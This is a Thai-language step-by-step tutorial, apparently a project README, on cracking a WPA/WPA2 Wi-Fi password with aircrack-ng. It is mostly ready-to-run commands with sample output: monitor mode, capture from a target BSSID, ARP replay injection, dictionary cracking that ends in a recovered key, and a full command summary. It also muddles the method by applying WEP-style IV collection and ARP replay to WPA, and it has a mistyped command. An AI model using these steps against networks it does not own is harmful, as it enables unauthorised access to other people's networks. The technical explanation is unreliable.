Aircrack-ng นั้นเป็นชุดซอฟต์แวร์เครือข่ายที่ได้รับการออกแบบมาเพื่อให้บรรลุวัตถุประสงค์ดังต่อไปนี้:
โปรดทราบว่าบทช่วยสอนนี้ไม่ใช่คำแนะนำที่ละเอียดถี่ถ้วน แต่มีจุดมุ่งหมายเพื่อสร้างทักษะพื้นฐานเพื่อทดสอบความปลอดภัยของเครือข่ายของคุณและทำความคุ้นเคยกับแนวคิดต่างๆ
การโจมตีที่สรุปไว้ด้านล่างนี้อิงตามเทคนิคแบบพาสซีฟ (การโจมตีแบบร้องขอ ARP เล่นซ้ำ) และมุ่งเน้นไปที่การกระจายแบบเดเบียนโดยสมมติว่าคุณมีการ์ดไร้สายที่ใช้งานได้พร้อมไดรเวอร์ที่ได้รับแพตช์สำหรับการฉีดแล้ว
สามารถติดตั้ง Aircrack-ng บนระบบปฏิบัติการที่ใช้เดเบียนได้โดยการคอมไพล์ซอร์สโค้ด (สำหรับรายละเอียดเพิ่มเติม คุณสามารถเยี่ยมชมเว็บไซต์อย่างเป็นทางการ)
ด้านล่างนี้คุณจะพบคำแนะนำในการติดตั้งข้อกำหนดพื้นฐานเพื่อสร้าง aircrack-ng สำหรับระบบปฏิบัติการที่ใช้ Debian
$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
รับสำเนาล่าสุดของ aircrack-ng:
$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng
ในการสร้าง aircrack-ng จะใช้ระบบการสร้าง Autotools ขั้นแรก ./configure
โครงการสำหรับการสร้างด้วยตัวเลือกที่เหมาะสม:
$ autoreconf -i
$ ./configure --with-experimental
จากนั้น คอมไพล์โปรเจ็กต์ด้วยคำสั่ง make
และใช้เป้าหมาย "การติดตั้ง" จากเป้าหมายเพิ่มเติมที่แสดงด้านล่างเพื่อทำการติดตั้งให้เสร็จสมบูรณ์
make check
make integration
make install
make uninstall
วัตถุประสงค์ของขั้นตอนนี้ทำให้แน่ใจได้ว่าการ์ดของคุณรองรับการฉีดได้สำเร็จ สมมติว่าชื่ออินเทอร์เฟซของคุณคือ "wlan0" (คุณสามารถเรียกคืนได้โดยพิมพ์ iwconfig
บนเทอร์มินัล) ให้พิมพ์คำสั่งต่อไปนี้:
# aireplay-ng --test wlan0
ระบบตอบสนอง:
18:10:59 wlan0 channel: 10
18:10:59 Trying broadcast probe requests...
18:10:59 Injection is working!
18:11:00 Found 1 AP
...
นี่เป็นการยืนยันว่าการ์ดของคุณสามารถแทรกแพ็กเก็ตได้
สิ่งแรกที่ต้องทำคือมองหาเป้าหมายที่จะนำการ์ดไร้สายของคุณเข้าสู่โหมดมอนิเตอร์โดยใช้ airmon-ng
อย่างไรก็ตาม ขอแนะนำอย่างยิ่งให้ kill
กระบวนการที่รบกวนทั้งหมดก่อนที่จะใช้ชุด aircrack-ng
# airmon-ng check kill
Killing these processes:
PID Name
870 dhclient
1115 wpa_supplicant
จากนั้น จึงเป็นไปได้ที่จะเปิดใช้งานโหมดจอภาพที่ใช้ในการสร้างอินเทอร์เฟซอื่น (mon0):
# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485
(monitor mode enabled for [phy0]wlan0 on [phy0]mon0)
คุณจะสังเกตเห็นว่า "wlan0" ได้รับการเข้าสู่โหมดจอภาพเรียบร้อยแล้ว จากนั้นเริ่ม airodump-ng
เพื่อค้นหาเครือข่าย:
# airodump-ng mon0
ค้นหาเครือข่ายไร้สายที่คุณต้องการถอดรหัส และจด BSSID และช่องสัญญาณจากเอาต์พุตต่อไปนี้:
CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
...
โปรดทราบว่าส่วนบนสุดของเอาต์พุตจะแสดงข้อมูลเกี่ยวกับ AP ในช่วง และส่วนล่างแสดงรายการไคลเอ็นต์ที่เชื่อมต่อกับ AP ที่เกี่ยวข้อง
เปิดเซสชันคอนโซลอื่นเพื่อบันทึกเวกเตอร์เริ่มต้นที่สร้างโดยเป้าหมายและบันทึกผลลัพธ์ลงในไฟล์:
# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
โดยที่ -c 10
เป็นช่องทางสำหรับเครือข่ายไร้สาย --bssid 08:00:BF:E6:31:2E
เป็นที่อยู่ MAC ของ AP -w output-file
กำหนดไฟล์เอาต์พุตที่จะมีเวกเตอร์การเริ่มต้น และ mon0
คือชื่ออินเทอร์เฟซ
ระบบตอบสนอง:
CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
BSSID STATION PWR Lost Packets Probes
08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782
หลังจากดำเนินการตามคำสั่งแล้ว ไฟล์ต่างๆ จะถูกสร้างขึ้น
การโจมตีเล่นซ้ำคำขอ ARP แบบคลาสสิกเป็นวิธีที่มีประสิทธิภาพที่สุดในการสร้างเวกเตอร์การเริ่มต้นใหม่และทำงานได้อย่างน่าเชื่อถือมาก วัตถุประสงค์ของขั้นตอนนี้คือเพื่อเริ่ม aireplay-ng
ในโหมดที่รับฟังคำขอ ARP จากนั้นจึงปฏิเสธคำขอเหล่านั้นกลับไปยังจุดเข้าใช้งานอีกครั้ง ให้ airodump-ng
และ aireplay-ng
ทำงานต่อไป เปิดเทอร์มินัลอื่นแล้วเรียกใช้การโจมตีเล่นซ้ำคำขอ ARP:
# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...
คุณสามารถตรวจสอบว่าแพ็กเก็ตถูกฉีดเข้าไปหรือไม่โดยดูที่หน้าจอ airodump-ng
ณ จุดนี้ คุณควรจะได้รับคีย์ WPA จากเวกเตอร์การเริ่มต้นที่รวบรวมไว้ในขั้นตอนก่อนหน้านี้ ในการโจมตีนี้ คุณต้องมีรายการคำศัพท์ และหากรหัสผ่านเครือข่ายไม่อยู่ในไฟล์เวิร์ด คุณจะไม่ถอดรหัสรหัสผ่าน โปรดทราบว่าเราเตอร์ WPA/WPA2 ส่วนใหญ่มาพร้อมกับรหัสผ่านสุ่มที่แข็งแกร่ง 12 ตัวอักษร ซึ่งผู้ใช้จำนวนมาก (อย่างถูกต้อง) ปล่อยให้ไม่เปลี่ยนแปลง หากคุณกำลังพยายามถอดรหัสรหัสผ่านเหล่านี้ ฉันขอแนะนำให้ใช้รายการรหัสผ่านที่มีความยาว WPA
เปิดเซสชันคอนโซลอื่นแล้วพิมพ์:
# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output * .cap
โดยที่ -a2
ระบุโหมดการโจมตีสำหรับ WPA/WPA2-PSK, -w wordlist.txt
อ้างถึงรายการคำในพจนานุกรมของคุณเอง และ output*.cap
จะเลือกไฟล์เอาต์พุตทั้งหมดที่มีนามสกุล .cap
นี่คือผลลัพธ์ของการโจมตีที่ประสบความสำเร็จ:
Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)
Time left: 0 seconds 15.62%
KEY FOUND! [ notsecure ]
Master Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63
Transient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A
EAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68
ด้านล่างนี้คุณจะพบรายการคำสั่งทั้งหมดที่จำเป็นในการถอดรหัสเครือข่าย WPA/WPA2
# kill all interfering processes prior to using the aircrack-ng
airmon-ng check kill
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
# start the ARP request replay attack
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
โครงการนี้ได้รับอนุญาตภายใต้ใบอนุญาต MIT - ดูรายละเอียดในไฟล์ใบอนุญาต
บทช่วยสอนนี้จัดทำขึ้นเพื่อการศึกษาเท่านั้น ฉันไม่ส่งเสริมการปฏิบัติที่เป็นอันตราย และฉันจะไม่รับผิดชอบต่อกิจกรรมที่ผิดกฎหมายใด ๆ